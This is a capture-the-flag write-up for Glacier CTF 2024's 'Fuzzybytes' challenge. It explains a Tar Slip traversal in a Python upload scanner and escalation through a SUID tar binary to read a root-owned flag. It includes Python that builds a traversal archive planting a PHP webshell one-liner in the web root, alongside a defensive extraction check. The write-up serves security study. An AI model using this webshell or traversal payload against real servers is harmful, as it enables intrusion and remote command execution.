# Glacier CTF-2024
The application is vulnerable to Zip Slip (Tar Slip), a directory traversal during archive extraction. The traversal is used to plant a file in the web root and get command execution, and a SUID tar binary is then used to read the flag.
# Fuzzybytes:
# Static analysis:
In Upload.php, the uploaded file is handed to /check_for_malicious_code.py for scanning.

In check_for_malicious_code.py, the application extracts the uploaded tar, checks the extracted files for malicious content, and then removes them from the scan directory. Extraction is done with tar.extractall and cleanup with shutil.rmtree, so every upload is extracted, scanned and deleted.

tar.extractall writes each member to the path stored in the archive without checking that the path stays inside the destination directory. A member whose name contains ../ segments (or an absolute path) is therefore written outside the scan directory. This is a directory traversal (Zip Slip / Tar Slip): the scan directory is cleaned up afterwards, but a file written elsewhere is not, so an uploader can plant a file anywhere the web server user can write.
POC:
# Dynamic analysis:
Create the tar file with a member whose name traverses out of the scan directory.
Try the payload in a local environment first.
Upload the file.
The member traversed out of the extraction directory and was written into /var/www/html, the web root.
This gives command execution through the planted file.
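The traversal payload from the steps above, together with the check the scanner should have made before calling tar.extractall, as an added example in Python. This is not the challenge's code: build_tar produces a tar whose member name is attacker-chosen, members_escaping lists the members that extractall would write outside the destination, and safe_extractall refuses such archives and otherwise extracts with the standard library's data filter where it exists (Python 3.12+). The web root /var/www/html is the one from the write-up; the scan directory, the PHP one-liner and all function names are assumptions made for illustration.

```python
import io
import os
import tarfile
import tempfile

# Constructed sample payload: the kind of PHP one-liner dropped into the web
# root. It is only file content here and is never executed.
WEBSHELL = b"<?php system($_GET['cmd']); ?>\n"


def build_tar(member_name: str, data: bytes) -> bytes:
    """Build an uncompressed tar in memory whose single member has an
    attacker-chosen name. tarfile does not sanitise TarInfo.name, so a name
    such as '../../var/www/html/shell.php' is stored verbatim."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name=member_name)
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def members_escaping(tar_bytes: bytes, dest: str) -> list:
    """Return the names of members that extractall(dest) would place outside
    dest: traversal or absolute member names, and symlinks/hardlinks whose
    target resolves outside dest."""
    dest_real = os.path.realpath(dest)
    escaping = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tar:
        for m in tar.getmembers():
            # join() discards dest_real when m.name is absolute, and
            # realpath() collapses the ../ segments, so both escapes show up
            # as a target that does not start with dest_real.
            target = os.path.realpath(os.path.join(dest_real, m.name))
            if os.path.commonpath([dest_real, target]) != dest_real:
                escaping.append(m.name)
                continue
            if m.issym():
                # symlink targets are relative to the link's own directory
                link = os.path.join(os.path.dirname(target), m.linkname)
            elif m.islnk():
                # hardlink targets are relative to the archive root
                link = os.path.join(dest_real, m.linkname)
            else:
                continue
            if os.path.commonpath([dest_real, os.path.realpath(link)]) != dest_real:
                escaping.append(m.name)
    return escaping


def safe_extractall(tar_bytes: bytes, dest: str) -> None:
    """Refuse archives with escaping members before anything is written.
    Where the stdlib provides the 'data' filter it is passed as well: it
    re-checks every member against the directory as it exists at that
    moment, so a path routed through a symlink extracted earlier in the same
    archive is caught too, which a pre-scan of names alone cannot see."""
    bad = members_escaping(tar_bytes, dest)
    if bad:
        raise ValueError("refusing to extract, members escape %s: %s" % (dest, bad))
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tar:
        if hasattr(tarfile, "data_filter"):
            tar.extractall(dest, filter="data")
        else:
            tar.extractall(dest)


def demo() -> dict:
    """Run a hostile and a benign archive through safe_extractall in a
    scratch scan directory and report what happened."""
    hostile = build_tar("../../var/www/html/shell.php", WEBSHELL)
    benign = build_tar("report.txt", b"clean upload\n")
    with tempfile.TemporaryDirectory() as scan_dir:
        try:
            safe_extractall(hostile, scan_dir)
            hostile_rejected = False
        except ValueError:
            hostile_rejected = True
        safe_extractall(benign, scan_dir)
        extracted = sorted(os.listdir(scan_dir))
    return {"hostile_rejected": hostile_rejected, "extracted": extracted}


if __name__ == "__main__":
    print(demo())
```

The vulnerable scanner is the else branch of safe_extractall with the pre-check removed: tar.extractall(dest) on the hostile archive writes shell.php into /var/www/html, and the later shutil.rmtree of the scan directory never touches it.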
The flag could not be read yet, though: the web server user has no permission to read /root/flag.txt.
Checking for SUID binaries showed that tar is SUID, so the flag can be archived with it.
A new payload that runs tar against the flag was uploaded and executed.
Checking the local directory afterwards shows the resulting flag.tar.
Extracting it gave the flag locally,
and the same steps gave the flag on the CTF instance.
Flag: gctf{c0nGr4tZ_on_Z1p_sLiDinG_4nD_Tar_diving}